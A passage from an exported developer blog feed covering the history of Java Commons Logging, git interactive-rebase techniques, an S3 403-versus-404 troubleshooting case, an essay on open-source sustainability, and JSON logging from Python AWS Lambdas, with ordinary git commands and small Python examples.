<p> <a href="https://cwiki.apache.org/confluence/display/COMMONS/Commons+Logging+FUD" target="_blank">Looking back</a>, it appears that these leaks were due to missing transitive dependencies in the deployment bundle.<a href="#footnote1">*</a> This took place in the days before Maven 2, when developers were responsible for identifying every JAR that went into their application, and ensuring that it somehow got there (which often meant lots of JARs checked into source control). It wouldn't be obvious that a library used Commons Logging, so the application developer wouldn't bother to add it to the deployed WAR. Unfortunately, Tomcat made it available on the system classpath (because it used Commons Logging internally), so the developers never knew they were missing the JAR. And since Commons Logging needed to know about the actual deployed logging framework, it would establish a strong reference to the Log4J implementation that <em>was</em> in the WAR, preventing the classloader from unloading the classes belonging to the WAR.
<p> That problem was rather quickly resolved: Commons Logging version 1.1 was released in 2006, Tomcat 6 moved it off the public classpath (although Tomcat 5 remained “in the wild” for quite some time), and Maven 2 ensured that a WAR would contain all of the dependencies that it needed. But developers have very long memories for things that go wrong, especially things that happened to someone else who blogged about it.<a href="#footnote2">**</a>
<p> At the same time, several popular Java frameworks appeared; Hibernate in 2001 and Spring in 2002 are two of the most familiar. These frameworks were complex enough to need logging, but for obvious reasons wouldn't want to be tied to a specific implementation. Commons Logging provided that capability (and thus became an untracked dependency for many builds).
<p> Moving forward, the new millennium saw continued change in the logging world. Log4J became an Apache project. Ceki Gülcü left Apache and developed Logback and SLF4J. And in the early 2010s, the remaining Apache Log4J committers decided that the Log4J 1.x implementation couldn't be extended and completely rewrote it as Log4J 2.x.
<p> Of these, SLF4J is particularly interesting because it was a logging facade, in direct competition with Commons Logging. Unlike Commons Logging, which tried to infer what underlying framework you were using, SLF4J required you to explicitly include “bridge” JARs for your actual implementation. SLF4J also provided additional features, such as formatted log messages, that were very attractive to application developers.
<p> However, adopting SLF4J had its own pain point: if you used Spring (or Hibernate, or any other library that depended on Commons Logging), Maven would add it to your build as a transitive dependency, where it might take precedence over the “jcl-over-slf4j” bridge from SLF4J (it all depended on the order that JARs were given to the classloader). A key feature of Maven POMs from this era is multiple <code><exclusions></code> sections to prevent such transitive dependencies.
<p> So here we are in 2020, and the logging frameworks scene is more complex than ever:
<ul>
<li> Log4J 1.x is still used by many projects, even though it was officially <a href="https://blogs.apache.org/foundation/entry/apache_logging_services_project_announces" target="_blank">end-of-lifed</a> in 2015. One of its most useful features <a href="https://blogs.apache.org/logging/entry/moving_on_to_log4j_2" target="_blank"> doesn't work under Java 9</a> (and, I presume, later versions), so its popularity may fade (although it seems that many people, particularly those using OpenJDK, are quite happy with Java 8).
<li> SLF4J/Logback is still used by many developers (including myself), even though new releases seem to have stalled at the 1.3.0-alpha stage (after 25 years of writing logging frameworks, I'm guessing Ceki is in need of a break).
<li> Log4J 2.x provides “bridge” JARs that let people use Commons Logging and SLF4J as their API, with Log4J2 as the back-end.
<li> Commons Logging still exists, but hasn't seen a release since 2014. Nor has its list of supported frameworks changed: Log4J 1.x, JUL, and Avalon LogKit.
</ul>
<p> Perhaps counter-intuitively, even with all of these changes, Commons Logging is still used by many libraries. However, it's become less visible. Spring Framework, for example, implements the API internally; as an application developer, you no longer need to explicitly exclude the JAR. And if you use Spring Boot, its <a href="https://search.maven.org/artifact/org.springframework.boot/spring-boot-dependencies/2.3.1.RELEASE/pom" target="_blank">3,000+ line dependency-management POM</a> will explicitly exclude Commons Logging from the libraries that use it.
<p> If you're developing a library, I think that Commons Logging is still the best choice for internal logging. It provides a consistent interface, and it's reasonable to expect that the consumers of your library already have the bridge JARs that they need (which might mean the internal implementation in Spring Framework). But there are a few best practices to keep your users from cursing you:
<ul>
<li> Mark your dependency as <a href="http://maven.apache.org/guides/introduction/introduction-to-dependency-mechanism.html#dependency-scope" target="_blank"><code>provided</code></a>. This tells Maven (or Gradle, or any of the other tools that follow the Maven standard) not to resolve the transitive dependency; it will rely instead on an explicitly-referenced JAR to provide the necessary classes.
<li> Ensure that you don't establish a transitive dependency via a package that you depend on, like HTTP Components. Take the time to look at your entire dependency tree (using <code>mvn dependency:tree</code> or equivalent), and add an exclusion if anything tries to pull in Commons Logging.
<li> Don't implement your own logging facade. It's tempting, I know: you want to protect the people that haven't configured logging into their application. And it seems easy: two classes (a log factory and a logger), with some reflection to pick an appropriate back end. But there's a lot of room for error. If you get it wrong, you'll introduce subtle bugs and performance issues, and your experienced users will curse you (and look for an alternative library). And if you get it right, you'll find that you've re-implemented Commons Logging. And good or bad, it won't actually help inexperienced users: they should learn to use logging rather than deploy a black box and cross their fingers.
</ul>
<p> Bottom line: if you're writing an application, use whatever logging framework you want. I <a href="https://www.kdgregory.com/index.php?page=logging.log4j2Plugins#parting_thoughts" target="_blank">have a strong preference for SLF4J/Logback</a>, but Log4J 2.x does have some features that it's missing. However, if you're implementing a library, stick with Commons Logging. In almost every case it will Just Work™.
<br/><br/><hr/>
<p> <a name="footnote1">*</a>
Open Source Archaeology can be a fascinating experience. It's next to impossible to find a source-code repository that gives a full history for older projects: they typically started on CVS, then moved to SVN, and are now on Git. In some cases they also moved between hosting providers (although it looks like Hibernate is still actively maintained <a href="https://sourceforge.net/projects/hibernate/" target="_blank"> on SourceForge</a>, which makes me feel better about a couple of my older projects). Each move lost information such as version tags (assuming they ever existed).
<p> Maven Central is also less helpful than expected, because many projects changed their group or artifact IDs over their lifetime (plus, who wants to dig through 55 <em>pages</em> of <code>org.springframework</code> JAR listings). And a lot of older versions are “retconned”: they were imported into the repository long after release, with a made-up, minimal POM.
<p> Fortunately, most of the larger projects maintain their own archives, so you can download a particular version and unpack it to see what's there. And if you're looking for dependencies, you can pick a likely class and run <code>javap -c</code> to disassemble it and then look at variable declarations. It's a lot of work, and some might call it obsessive. But that's how I learned that Spring Framework 1.0 didn't log at all, while 1.2 used Commons Logging.
<p> <a name="footnote2">**</a>
They're also very vocal about it. I wrote an <a href="http://kdgregory.com/index.php?page=java.logging" target="_blank">article on logging techniques</a> in 2008 that referenced Commons Logging (because in my world it wasn't an issue), and constantly received comments telling me that it was horrible and should never be used. I eventually updated the article to reference SLF4J, primarily because it was focused on application logging, but also to keep the critics quiet.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-53183708426183447382020-04-09T07:46:00.001-04:002020-04-09T07:46:50.764-04:00Stupid Git Tricks: Interactive Rebase<p> I like to provide a nice, clean history in my pull requests. Reviewers should
be able to follow each commit, and see how the functionality is built up. No
extraneous commits. Nothing out of order. Everything looking like one smooth
path from idea to implementation.
<p> Unfortunately, my development process doesn't quite work that way. For one thing,
I commit (and push) frequently — as in every 10-15 minutes when I'm making lots
of changes. For another, I'll often realize that there's a small change that should
have been introduced several commits previously. For these, and other reasons, I
find <code>git rebase -i</code> invaluable.
<p> OK, some of you are probably outraged: “you're changing history!” Settle
down. This is for development branches, not master. And I'm willing to adapt in a team
setting: if my team members want to see messy commit histories in a pull request, I'm
OK with giving that to them. But only if they squash merges.
<p> So, here are a few of the ways that I change history. You're free to avoid them.
<h1> Combining commits </h1>
<p> Here's one morning's commit history:
<pre class="codeSample">
commit 6aefd6989ba7712cb047d661b68d34c888badea4 (HEAD -> dev-writing_log4j2, origin/dev-writing_log4j2)
Author: Me <me@example.com>
Date: Sun Apr 5 12:13:19 2020 -0400
checkpoint: content updates
...
commit e8503f01c72618709ac5231a78cfa8549fcfb7b3
Author: Me <me@example.com>
Date: Sun Apr 5 09:22:51 2020 -0400
checkpoint: content updates
commit 8bdb788421c56cb0defe73ce87b9e1ffe4266b0c
Author: Me <me@example.com>
Date: Sat Apr 4 13:57:27 2020 -0400
add reference to sample project
</pre>
<p> Three hours of changes, split up over eight commits, with regular pushes so I wouldn't
lose work if my SSD picked today to fail. I really don't want to see all of those in my
history.
<p> The solution is to squash those commits down using an interactive rebase:
<pre class="codeSample">
git rebase -i 8bdb788421c56cb0defe73ce87b9e1ffe4266b0c
</pre>
<p> When I run this, it starts my editor and shows me the following:
<pre class="codeSample">
pick e8503f0 checkpoint: content updates
pick f71ddca checkpoint: content updates
pick a8d7a25 checkpoint: content updates
pick 6b87b9b checkpoint: content updates
pick 556a346 checkpoint: content updates
pick 466dd26 checkpoint: content updates
pick 0034657 checkpoint: content updates
pick 6aefd69 checkpoint: content updates
# Rebase 8bdb788..6aefd69 onto 8bdb788 (8 commands)
#
# Commands:
# p, pick = use commit
# r, reword = use commit, but edit the commit message
# e, edit = use commit, but stop for amending
# s, squash = use commit, but meld into previous commit
# f, fixup = like "squash", but discard this commit's log message
# x, exec = run command (the rest of the line) using shell
# d, drop = remove commit
#
# These lines can be re-ordered; they are executed from top to bottom.
#
# If you remove a line here THAT COMMIT WILL BE LOST.
#
# However, if you remove everything, the rebase will be aborted.
#
# Note that empty commits are commented out
</pre>
<p> A list of commits, instructions on how to work with them, and a few warnings
about what happens if I do something dumb. To squash these commits I update
all but the first to be a “fixup”:
<pre class="codeSample">
pick e8503f0 checkpoint: content updates
f f71ddca checkpoint: content updates
f a8d7a25 checkpoint: content updates
f 6b87b9b checkpoint: content updates
f 556a346 checkpoint: content updates
f 466dd26 checkpoint: content updates
f 0034657 checkpoint: content updates
f 6aefd69 checkpoint: content updates
</pre>
<p> Save this and exit the editor, and Git applies all of those changes:
<pre class="codeSample">
Successfully rebased and updated refs/heads/dev-writing_log4j2.
</pre>
<p> And now when I look at my history, this is what I see:
<pre class="codeSample">
commit 51f5130422b524603d6249ef40e012aeecde5422 (HEAD -> dev-writing_log4j2)
Author: Me <me@example.com>
Date: Sun Apr 5 09:22:51 2020 -0400
checkpoint: content updates
commit 8bdb788421c56cb0defe73ce87b9e1ffe4266b0c
Author: Me <me@example.com>
Date: Sat Apr 4 13:57:27 2020 -0400
add reference to sample project
</pre>
<p> Note that the last commit hash has changed, and my working HEAD no longer
refers to the origin branch. This means that I'm going to need to force-push
these changes. But before that, there's one more thing that I want to do:
<pre class="codeSample">
git commit --amend -m "content updates" --reset-author
</pre>
<p> This command does two things. First, it updates my commit message: this is no
longer a “checkpoint” commit. The second thing it does is update
the basic commit info, in this case just the timestamp. If you looked closely
at the history above, you saw that all of the commits had been marked with the
timestamp of the first; <code>--reset-author</code> makes the history more closely
reflect what actually happened (it can also be used to pretend that other people
didn't contribute to the commit, but I'll assume you're more honorable than that).
<p> Now the log looks like this:
<pre class="codeSample">
commit fdef5d6f0a19218784b87a596322816347db2232 (HEAD -> dev-writing_log4j2)
Author: Me <me@example.com>
Date: Sun Apr 5 12:22:46 2020 -0400
content updates
commit 8bdb788421c56cb0defe73ce87b9e1ffe4266b0c
Author: Me <me@example.com>
Date: Sat Apr 4 13:57:27 2020 -0400
add reference to sample project
</pre>
<p> Which is what I want to see, so time to force-push and overwrite the previous
chain of commits:
<pre class="codeSample">
> git push -f
Counting objects: 4, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (4/4), done.
Writing objects: 100% (4/4), 4.52 KiB | 2.26 MiB/s, done.
Total 4 (delta 3), reused 0 (delta 0)
To ssh://git-codecommit.us-east-1.amazonaws.com/v1/repos/Website
+ 6aefd69...fdef5d6 dev-writing_log4j2 -> dev-writing_log4j2 (forced update)
</pre>
<p> I should note here that the previous chain of commits still exists in your repository.
If, for some reason, you want to retrieve them, you can explicitly check-out the former
head commit:
<pre class="codeSample">
git checkout -b recovery 6aefd6989ba7712cb047d661b68d34c888badea4
</pre>
<p> Of course, if you close your terminal window, you might not find that commit hash
again, so if you're worried you should write it down somewhere. When I'm making
a large set of changes, I'll often create a temporary branch from the one that's
being rebased, just in case (unfortunately, I often forget to switch back to the
branch that I want to rebase).
<h1> Re-ordering commits </h1>
<p> Especially at the start of a new project, I might jump around and edit several different
things, resulting in a messy commit history:
<pre class="codeSample">
pick fc46b5b update docs
pick 0f734fb minor change to feature X
pick 2233c01 update docs
pick fe56f59 another change to feature X
pick d3fb025 related change to feature Y
pick aec87c1 update docs
pick 66ef266 something unrelated to either X or Y
pick 96179b3 changing Y
pick 904a779 update docs
</pre>
<p> Interactive rebase allows you to move commits around, and then optionally squash those
moved commits:
<pre class="codeSample">
pick fc46b5b update docs
f 2233c01 update docs
f aec87c1 update docs
f 904a779 update docs
pick 0f734fb minor change to feature X
f fe56f59 another change to feature X
pick d3fb025 related change to feature Y
f 96179b3 changing Y
pick 66ef266 something unrelated to either X or Y
</pre>
<p> There are a couple of gotchas when you do this. First, you need to make sure that
you're not changing <em>both</em> X and Y in the same commit. If you do, you can
still squash the commits together, but it's pointless to try to track the work in
each feature separately.
<p> Second, make sure that you preserve order: in my example, commit <code>0f734fb</code>
happened before <code>fe56f59</code>, and the interactive rebase needs to keep them in
this order. If you don't, you can end up with merge conflicts that are challenging
to resolve.
<p> Lastly, and most important, <em>make sure you have the same number of commits that
you started with</em>. If you accidentally delete a commit rather than move it, you
will lose that work. For this reason, I tend to use interactive rebase on small pieces
of my history, perhaps making several passes over it.
<h1> Editing commits </h1>
<p> When writing my article about Log4J2 appenders, I saw a comment that I wanted to
change in the accompanying example code. Unfortunately, it wasn't the HEAD commit:
<pre class="codeSample">
commit 8007214ef232abf528baf2968162b51dcd2c09ca
Author: Me <me@example.com>
Date: Sat Apr 4 09:34:53 2020 -0400
README
commit 38c610db6a02747d7017dff0a9c2b7ed290e30e1
Author: Me <me@example.com>
Date: Sat Apr 4 08:34:12 2020 -0400
stage-10: add tests
commit 5dfd79e3f879038e915fa04c83f8eb9b0f695e35
Author: Me <me@example.com>
Date: Tue Mar 31 08:38:17 2020 -0400
stage-9: implement a lookup
</pre>
<p> There are two ways that I could have approached this. The first would be to create
a new commit and then reorder it and turn it into a fixup. The second is to edit
the file as part of an interactive rebase, by marking the commit with an "e":
<pre class="codeSample">
pick 5dfd79e stage-9: implement a lookup
e 38c610d stage-10: add tests
pick 8007214 README
</pre>
<p> When I do this, git works through the commits, and stops when it reaches the marked
one:
<pre class="codeSample">
Stopped at 38c610d... stage-10: add tests
You can amend the commit now, with
git commit --amend
Once you are satisfied with your changes, run
git rebase --continue
</pre>
<p> I can now edit any files in my working tree (they don't have to be part of the original
commit). Once I'm done, I do a <code>git add</code> for changed files, followed by
<em>both</em> <code>git commit --amend</code> and <code>git rebase --continue</code>.
After the rebase completes, I can force-push the changes.
<p> Beware that editing commits can introduce merge conflicts: if a later commit touches the
same code, you'll have to stop and resolve the conflict. This is more likely when you edit
early commits, or when the edits are wide-ranging. It is far less likely for changes
like comments.
<h1> Cherry-picking into the middle of a branch </h1>
<p> You may be familiar with <code>git cherry-pick</code>, which takes an arbitrary commit and
puts it at the HEAD of your current branch. This can be useful when two teams are working
on the same general area of the codebase: often one team will incidentally do something
that the other team finds valuable.
<p> Interactive rebase is like cherry-picking on steroids: you can insert a commit anywhere in
your commit tree. To be honest, I find this more risky than beneficial; instead I would
cherry-pick to HEAD and then perhaps use an interactive rebase to move the commit to where
it “belongs.” But in the interest of “stupid git tricks,” here we go.
<p> Let's say that you've been working on a branch and have been making changes, starting with
changes to the build scripts. Then you talk with a colleague, and learn that she has also
made changes to the build. You could cherry-pick her change to the end of your branch and
use it moving forward, but you're somewhat OCD and want to keep the build changes together.
So you fire up <code>git rebase -i</code> and add your colleague's commit as a new
“pick”:
<pre class="codeSample">
pick ffc954d build scripts
p 1438a13d11d6001de876a034f434a050c09b587d
pick b497403 update 1
pick 18e8415 update 2
pick 33a4e9d update 3
</pre>
<p> Now when you do a <code>git log</code>, you see something like this:
<pre class="codeSample">
... skipping two commits
commit 7b62acb8d9100f379a0d43e3227c36ae91c1edd9
Author: Me <me@example.com>
Date: Fri Mar 27 10:11:01 2020 -0400
update 1
commit c579ed88403354faed83213da63d4546c5aa13b5
Author: Someone Else <someone.else@example.com>
Date: Sun Jan 5 09:30:14 2020 -0500
some build changes
commit ffc954dc41555282ece3e2b7a0197472c0af9f11
Author: Me <me@example.com>
Date: Mon Jan 6 08:02:30 2020 -0500
build scripts
</pre>
<p> Note that the commit hash has changed: from <code>1438a13d</code> to
<code>c579ed88</code>. This is because it's now part of a new branch:
a commit hash is based not merely on the content of the commit, but
also the commit chain that it's a part of. However, the author's
name and the commit date are unchanged.
<h1> Wrapping up: a plea for clean commit histories </h1>
<p> A standard Git merge, by preserving the chains of commits that led to the
merge point, is both incredibly useful and incredibly annoying. It's useful,
in that you can move along the original branch to understand the context of
a commit. It's annoying, in that your first view of the log shows the
commits intermingled and ordered by date, completely removing context.
<p> I find messy histories to be similar. Software development doesn't happen in
a clean, orderly fashion: developers often attack a problem from multiple
sides at once. And that can result in commit histories that jump around:
instead of “fix foo” you have “add test for bar”,
followed by “make test work”, followed by an endless string of
“no, really, this time everything works”.
<p> Maybe you find that informative. If not, do your future self (and your
coworkers) a favor and clean it up before making it part of the permanent
record.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-76506005531681008802020-03-30T07:25:00.001-04:002020-03-30T07:25:18.635-04:00S3 Troubleshooting: when 403 is really 404<p> It's generally a bad idea to click on links in strange websites, but <a href="https://com-kdgregory-static.s3.amazonaws.com/example" target="_blank">this one</a> is key to this post. If you were to click this link, you'd see a response like the following, and more importantly, the HTTP response code would be a 403 (Forbidden).
<pre class="codeSample">
<Error>
    <Code>AccessDenied</Code>
    <Message>Access Denied</Message>
    <RequestId>CC60CD5C69BC271F</RequestId>
    <HostId>gBmQHQNr/7CFHLCbiYjqzm3iT2m5WQCobTfxFiXIj9K0448YrtvJKbOimEXHwAxwILw0oDcS9TI=</HostId>
</Error>
</pre>
<p> However, that bucket is open to the world: AWS reminds me of this by flagging it as “Public” in bucket listings, and putting a little orange icon on the “Permissions” tab when I look at its properties. And if you click <a href="https://com-kdgregory-static.s3.amazonaws.com/example.txt" target="_blank">this similar link</a> you'll get a perfectly normal test file.
<p> The difference between the two links, of course, is that the former file doesn't exist in my bucket. But why isn't S3 giving me a 404 (Not Found) error? When I look at the <a href="https://docs.aws.amazon.com/AmazonS3/latest/API/ErrorResponses.html" target="_blank">list of S3 error responses</a> I see that there's a <code>NoSuchKey</code> response — indeed, it's the example at the head of that page.
<p> As it turns out, the reason for the 403 is called out in the <a href="https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetObject.html" target="_blank">S3 GetObject</a> API documentation:
<ul>
<li> If you have the <code>s3:ListBucket</code> permission on the bucket, Amazon S3 will return an HTTP status code 404 ("no such key") error.
<li> If you don’t have the <code>s3:ListBucket</code> permission, Amazon S3 will return an HTTP status code 403 ("access denied") error.
</ul>
<p> While my bucket allows public read access to its objects via an access policy, that policy follows the principle of least privilege and only grants <code>s3:GetObject</code>. As do almost all of the IAM policies that I write for things like Lambdas.
<p> Which brings me to the reason for writing this post: Friday afternoon I was puzzling over an error with one of my Lambdas: I was creating dummy files to load-test an S3-triggered Lambda, and it was consistently failing with a 403 error. The files were in the source bucket, and the Lambda had <code>s3:GetObject</code> permission.
<p> I had to literally sleep on the error before realizing what happened. I was generating filenames using the Linux <code>date</code> command, which would produce output like <code>2020-03-27T15:43:31-04:00</code>. However, <a href="https://docs.aws.amazon.com/AmazonS3/latest/dev/notification-content-structure.html" target="_blank">S3 notifications url-encode the object key</a>, so the key in my events looked like this: <code>2020-03-27T15%3A43%3A31-04%3A00-c</code>. Which, when passed back to S3, didn't refer to any object in the bucket. But because my Lambda didn't have <code>s3:ListBucket</code> I was getting the 403 rather than a 404.
<p> So, to summarize the lessons from my experience:
<ol>
<li> Always url-decode the keys in an S3 notification event. How you do this depends on your language; for Python use the <code>unquote_plus()</code> function from the <a href="https://docs.python.org/3/library/urllib.parse.html#url-quoting" target="_blank">urllib.parse</a> module (there's a sketch after this list).
<li> If you see a 403 error, check your permissions first, but also look to see if the file you're trying to retrieve actually exists.
</ol>
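<p> To illustrate the first lesson, here's a minimal sketch of a handler that decodes
the key before using it. The <code>process()</code> function is hypothetical, standing
in for whatever your Lambda actually does with the object:
<pre class="codeSample">
from urllib.parse import unquote_plus

def lambda_handler(event, context):
    for record in event['Records']:
        bucket = record['s3']['bucket']['name']
        # '2020-03-27T15%3A43%3A31-04%3A00' decodes to '2020-03-27T15:43:31-04:00'
        key = unquote_plus(record['s3']['object']['key'])
        process(bucket, key)   # hypothetical: retrieve and handle the object
</pre>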
<p> You'll note that I didn't say “grant <code>s3:ListBucket</code> in your IAM policies.” The principle of least privilege still applies.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-42957212298589492012020-01-06T08:00:00.002-05:002020-01-06T08:00:28.237-05:00The Future of Open Source<p> The world of open source software seems to be going through a period of soul-searching. On the one hand, individual maintainers have retracted packages, causing disruption for the communities that depended on those packages. On the other, software-as-a-service providers are making more money from some applications than their creators.
<p> This is all happening in a world where businesses depend on open-source to operate. It doesn't matter whether you're an individual launching a startup with PHP and MySQL, or a multi-national replacing your mainframe with a fleet of Linux boxes running Java. Your business depends on the work of people that have their own motivations, and those motivations may not align with yours. I think this is an untenable situation, one that will eventually resolve by changing the nature of open-source.
<p> Before looking at how I think it will resolve, I want to give some historical perspective. This is one person's view; you may not agree with it.
<p> I date the beginning of “professional” open source as March 1985: that was the month that <a href="https://archive.org/details/dr_dobbs_journal_vol_10" target="_blank">Dr Dobbs published an article by Richard Stallman</a>, an article that would turn into the <a href="https://www.gnu.org/gnu/manifesto.en.html" target="_blank">GNU Manifesto</a>. There was plenty of freely available software published prior to that time; my experience was with the Digital Equipment Corporation User Society (DECUS), which published <a href="https://archive.org/details/bitsavers_decdecuspratalogPDP11Aug78_8403699" target="_blank">an annual catalog</a> of programs ranging in complexity from fast fourier transform routines to complete language implementations. These came with source code and no copyright attached (or, at least, no <em>registered</em> copyright, which was an important distinction in the 1970s and early 1980s).
<p> What was different about the GNU Manifesto, and why I refer to it as the start of “professional” open source, was that Stallman set out a vision of how programmers could make money when they gave away their software. In his view, companies would get software for free but then hire programmers to maintain and enhance it.
<p> In 1989, Stallman backed up the ideas of the GNU Manifesto with the <a href="https://www.gnu.org/licenses/old-licenses/gpl-1.0.html" target="_blank">GNU General Public License</a> (GPL), which was applied to the software produced by the GNU project. This license introduced the idea of “copyleft”: a requirement that any “derivative works” also be licensed using the GPL, meaning that software developers could not restrict access to their code. Even though that requirement was relaxed in 1991 with the “library” (now “lesser”) license, meaning that you could use the GNU C compiler to compile your programs without them becoming open source by that act, the GPL scared most corporations away from any use of the GNU tools (as late as 1999, I was met with a look of shock when I suggested that the GNU C compiler could make our multi-platform application easier to manage).
<p> In my opinion, it was the Apache web server, introduced in 1995, that made open-source palatable (or at least acceptable) to the corporate world. In large part, this was due to the Apache license, which essentially said “do what you want, but don't blame us if anything goes wrong.” But also, I think it was because the corporate world was completely unprepared for the web. To give a sense of how quickly things moved: in 1989 I helped set up the DNS infrastructure for a major division of one of the world's largest corporations; I had only a few years of experience with TCP/IP networking, but it was more than the IT team. NCSA Mosaic appeared four years later, and within a year or two after that companies were scrambling to create a web presence. Much like the introduction of PCs ten years earlier, this happened outside of corporate IT; while there were commercial web-servers (including Microsoft and Netscape), “free as in beer” was a strong incentive.
<p> Linux, of course, was a thing in the late 1990s, but in my experience wasn't used outside of a hobbyist community; corporations that wanted UNIX used a commercial distribution. In my view, Linux became popular due to two things: first, Eric Raymond published <a href="http://www.catb.org/~esr/writings/cathedral-bazaar/cathedral-bazaar/" target="_blank">The Cathedral and the Bazaar</a> in 1997, which made the case that open source was actually better than commercial systems: it has to be good to survive. But also, after the dot-com crash, “free as in beer” became a selling point, especially to the startups that would create “Web 2.0.”
<p> Jumping forward 20 years, open-source software is firmly embedded in the corporate world. While I'm an oddity for running Linux on the desktop, all of the companies I've worked with in the last ten or more years used it for their production deployments. And not just Linux; the most popular database systems are open source, as are the tools to provision and manage servers, and even productivity tools such as LibreOffice. And for most of the users of these tools, “free as in beer” is an important consideration.
<p> But stability is (or should be) another important consideration, and I think that many open-source consumers have been lulled into a false sense of stability. The large projects, such as GNU and Apache, have their own repositories and aren't going anywhere. And the early “public” repositories, such as SourceForge and Maven Central, adopted a policy that “once you publish something here, it will never go away.” But newer repositories don't have such a policy, and as we saw with <code>left-pad</code> in 2016 and <code>chef-sugar</code> in 2019, authors are willing and able to pull their work down.
<p> At the same time, companies such as Mongo and Elastic N.V. found that releasing their core products as open-source might not have been such a great idea. Software-as-a-service companies such as AWS are able to take those products and host them as a paid service, often making more money from the hosting than the original companies do from the services they offer around the product. And in response, the product companies have changed the license on their software, attempting to cut off that usage (or at least capture a share of it).
<p> Looking at both behaviors, I can't help but think that one of the core tenets of the GNU manifesto has been forgotten: that the developers of open-source software do not have the right to control its use. Indeed, the Manifesto is quite clear on this point: “[programmers] deserve to be punished if they restrict the use of these programs.”
<p> You may or may not agree with that idea. I personally believe that creators have the right to decide how their work is used. But I also believe that releasing your work under an open-source license is a commitment, one that can't be retracted.
<p> Regardless of any philosophical view on the matter, I think there are two practical outcomes.
<p> The first is that companies — or development teams — that depend on open-source software need to ensure their continued access to that software. Nearly eight years ago <a href="https://blog.kdgregory.com/2012/08/taming-maven-local-repository-server.html" target="_blank">I wrote about using a local repository server</a> when working with Maven and Java. At the time I was focused on coordination between different development teams at the same company. If I were to rewrite the post today, it would focus on using the local server to ensure that you always have access to your dependencies.
<p> A second, and less happy change, is that I think open-source creators will lose the ability to control their work. One way this will happen is for companies whose products are dependent on open-source to provide their own public repositories — indeed, I'm rather amazed that <a href="https://www.chef.io/products/" target="_blank">Chef</a> doesn't offer such a repository (although perhaps they're gun-shy after the reaction to their hamfisted attempt to redistribute <em>chef-sugar</em>).
<p> The other way this will happen is for service-provider companies to fork open-source projects and maintain their own versions. Amazon has already done this, for Elasticsearch and also OpenJDK; I don't expect them to be the only company to do so. While these actions may damage the companies' reputations within a small community of open-source enthusiasts, the much larger community of their clients will applaud those actions. I can't imagine there are many development teams that will say “we're going to self-host Elasticsearch as an act of solidarity”; convenience will always win out.
<p> If you're like me, a person responsible for a few niche open-source projects, this probably won't matter: nobody's going to care about your library (although note that both <code>left-pad</code> and <code>chef-sugar</code> started out as single-maintainer niche projects). But if you're a company that is planning to release your core product as open-source, you should think long and hard about why you want to do this, and whether your plan to make money is viable. And remember these words from the GNU Manifesto: “programming will not be as lucrative on the new basis as it is now.”
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-34260440730929010272019-10-08T07:03:00.003-04:002019-10-08T07:03:47.018-04:00Writing JSON Logs from a Python Lambda<p> My <a href="http://blog.kdgregory.com/2019/09/streaming-cloudwatch-logs-to_12.html" target="_blank">previous post</a> looked at a Lambda function that would accept log messages from one Kinesis stream, transform them into JSON, and write them to another Kinesis stream, from which they would be inserted into an Elasticsearch cluster. In that post I skipped over the actual transformation code, other than saying that it would pass existing JSON objects unchanged, and recognize the <a href="https://docs.aws.amazon.com/lambda/latest/dg/python-logging.html" target="_blank">Lambda Python log format</a>.
<p> However, I'd prefer not to perform this translation: I want to write log messages <a href="https://www.kdgregory.com/index.php?page=aws.loggingPipeline#application" target="_blank">as JSON</a>, which will allow me to easily add additional information to the message and use searches based on specific details. With the <a href="https://docs.python.org/3/library/logging.html" target="_blank">Python logging facility</a>, it's <a href="https://gist.github.com/kdgregory/82cc3942311c1983a9e141a8ced1f5fd" target="_blank">easy to make this happen</a>.
<p> Unless you're running on Lambda.
<p> The linked example assumes that you can configure logging at the start of your main module. However, Lambda configures logging for you, before your code gets loaded. If you print <code>logging.root.handlers</code> from a Lambda, you'll see that there's already a <code>LambdaLoggerHandler</code> installed. To use my formatter, you need to update this handler:
<pre class="codeSample">
for handler in logging.root.handlers:
    handler.setFormatter(JSONFormatter())
</pre>
<p> While I could have replaced this handler entirely, with one that wrote to StdErr, I was concerned that it performed some undocumented magic. One thing that I did discover, although it doesn't quite count as magic, is that it inserts the Lambda's request ID in the <code>LogRecord</code> before passing it to the formatter.
<p> By not using that piece of information, I require that the formatter be initialized for every Lambda invocation, so that it can get the request ID out of the invocation context. This also allows me to pull out the Lambda name and version, or any of the other <a href="https://docs.aws.amazon.com/lambda/latest/dg/python-context-object.html" target="_blank">documented context attributes</a>.
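<p> To give a sense of what this looks like, here's a minimal sketch of such a formatter;
the field names are my own choices, and the documented example linked below is more
complete:
<pre class="codeSample">
import json
import logging
import time

class JSONFormatter(logging.Formatter):
    """ Minimal sketch: construct once per invocation, passing the Lambda
        context so that the request ID can be captured.
        """

    def __init__(self, context=None):
        super().__init__()
        self.request_id = getattr(context, 'aws_request_id', None)

    def format(self, record):
        result = {
            'timestamp': time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime(record.created)),
            'level':     record.levelname,
            'logger':    record.name,
            'message':   record.getMessage()
        }
        if self.request_id:
            result['requestId'] = self.request_id
        return json.dumps(result)
</pre>
<p> With that in place, the loop shown above becomes
<code>handler.setFormatter(JSONFormatter(context))</code>, executed at the top of each
invocation.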
<p> If you also want JSON-formatted logs from your Lambdas, I've included a documented example <a href="https://github.com/kdgregory/aws-misc/tree/master/lambda/json-logging" target="_blank">here</a>.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-10429500792195694542019-09-12T07:21:00.001-04:002019-09-12T07:21:59.785-04:00Streaming CloudWatch logs to Elasticsearch, Part 2: Teh Codez<p> My last post described my different attempts at incorporating CloudWatch Logs events into an Elasticsearch-based logging pipeline. This post looks at the actual code. To avoid boring you, it just touches on the main points; if you want the whole thing go <a href="https://github.com/kdgregory/aws-misc/tree/master/lambda/cloudwatch-log-transform" target="_blank">here</a>.
<h1> Creating the subscription </h1>
